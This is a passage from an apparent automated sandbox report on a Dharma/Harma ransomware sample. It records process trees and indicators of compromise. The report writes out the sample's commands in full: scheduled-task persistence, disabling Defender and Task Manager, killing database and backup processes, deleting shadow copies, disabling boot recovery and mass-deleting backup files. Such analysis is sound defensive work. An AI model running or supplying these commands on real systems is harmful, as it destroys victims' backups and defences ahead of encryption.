SeIncBasePriorityPrivilege 4580 wevtutil.exe Token: SeCreatePagefilePrivilege 4580 wevtutil.exe Token: SeBackupPrivilege 4580 wevtutil.exe Token: SeRestorePrivilege 4580 wevtutil.exe Token: SeShutdownPrivilege 4580 wevtutil.exe Token: SeDebugPrivilege 4580 wevtutil.exe Token: SeSystemEnvironmentPrivilege 4580 wevtutil.exe Token: SeRemoteShutdownPrivilege 4580 wevtutil.exe Token: SeUndockPrivilege 4580 wevtutil.exe Token: SeManageVolumePrivilege 4580 wevtutil.exe Token: 33 4580 wevtutil.exe Token: 34 4580 wevtutil.exe Token: 35 4580 wevtutil.exe Token: 36 4580 wevtutil.exe Token: SeDebugPrivilege 3016 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
VirusShare_5c36e305d926e55ef98d392176890cd2.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3448 wrote to memory of 1036 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 1036 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 1036 wrote to memory of 4408 1036 cmd.exe schtasks.exe PID 1036 wrote to memory of 4408 1036 cmd.exe schtasks.exe PID 3448 wrote to memory of 3432 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 3432 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 4672 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 4672 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 4696 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 4696 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 4696 wrote to memory of 1796 4696 cmd.exe schtasks.exe PID 4696 wrote to memory of 1796 4696 cmd.exe schtasks.exe PID 3448 wrote to memory of 4600 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 4600 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 4600 wrote to memory of 4316 4600 cmd.exe attrib.exe PID 4600 wrote to memory of 4316 4600 cmd.exe attrib.exe PID 3448 wrote to memory of 348 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 348 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 348 wrote to memory of 232 348 cmd.exe schtasks.exe PID 348 wrote to memory of 232 348 cmd.exe schtasks.exe PID 3448 wrote to memory of 3552 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 3552 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3552 wrote to memory of 1052 3552 cmd.exe schtasks.exe PID 3552 wrote to memory of 1052 3552 cmd.exe schtasks.exe PID 3448 wrote to memory of 3916 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 3916 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3916 wrote to memory of 3992 3916 cmd.exe attrib.exe PID 3916 wrote to memory of 3992 3916 cmd.exe attrib.exe PID 3448 wrote to memory of 3672 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 3672 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3672 wrote to memory of 4320 3672 cmd.exe attrib.exe PID 3672 wrote to memory of 4320 3672 cmd.exe attrib.exe PID 3448 wrote to memory of 3272 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 3272 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 5020 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 5020 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3272 wrote to memory of 3724 3272 cmd.exe cmd.exe PID 3272 wrote to memory of 3724 3272 cmd.exe cmd.exe PID 3448 wrote to memory of 1660 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 1660 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 5020 wrote to memory of 2372 5020 cmd.exe reg.exe PID 5020 wrote to memory of 2372 5020 cmd.exe reg.exe PID 1660 wrote to memory of 3860 1660 cmd.exe cmd.exe PID 1660 wrote to memory of 3860 1660 cmd.exe cmd.exe PID 1660 wrote to memory of 2744 1660 cmd.exe taskkill.exe PID 1660 wrote to memory of 2744 1660 cmd.exe taskkill.exe PID 3448 wrote to memory of 4736 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 4736 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3724 wrote to memory of 2696 3724 cmd.exe icacls.exe PID 3724 wrote to memory of 2696 3724 cmd.exe icacls.exe PID 3448 wrote to memory of 4752 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 4752 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 4404 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 4404 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 3132 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 3132 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 3728 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 3728 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3860 wrote to memory of 4756 3860 cmd.exe taskkill.exe PID 3860 wrote to memory of 4756 3860 cmd.exe taskkill.exe PID 3448 wrote to memory of 1016 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 3448 wrote to memory of 1016 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 1016 wrote to memory of 4524 1016 cmd.exe reg.exe PID 1016 wrote to memory of 4524 1016 cmd.exe reg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 5 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 3992 attrib.exe 4320 attrib.exe 3088 attrib.exe 5040 attrib.exe 4316 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe"C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"2⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s harma.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s harma.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\harma.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\FILES ENCRYPTED.txt" && exit2⤵
-
C:\Windows\system32\cmd.execmd.exe /c "C:\ProgramData\FILES ENCRYPTED.txt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet2⤵
-
C:\Windows\system32\cmd.execmd.exe /c vssadmin Delete Shadows /All /Quiet3⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete2⤵
-
C:\Windows\system32\cmd.execmd.exe /c wmic shadowcopy delete3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures2⤵
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} boostatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no2⤵
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} recoveryenabled no3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop avpsus /y2⤵
-
C:\Windows\system32\net.exenet stop avpsus /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\system32\net.exenet stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop mfewc /y2⤵
-
C:\Windows\system32\net.exenet stop mfewc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y2⤵
-
C:\Windows\system32\net.exenet stop BMR Boot Service /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\system32\net.exenet stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY start=disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY$ECWDB2 start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLWriter start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SstpSvc start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mspub.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q c:*.VHD c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win c:*.dsk2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q d:*.VHD d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win d:*.dsk2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q e:*.VHD e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win e:*.dsk2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q f:*.VHD f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win f:*.dsk2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q g:*.VHD g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win g:*.dsk2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q h:*.VHD h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win h:*.dsk2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del %02⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s HRMPUB2⤵
-
C:\Windows\system32\attrib.exeattrib +h +s HRMPUB3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\HRMPUB2⤵
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\HRMPUB3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
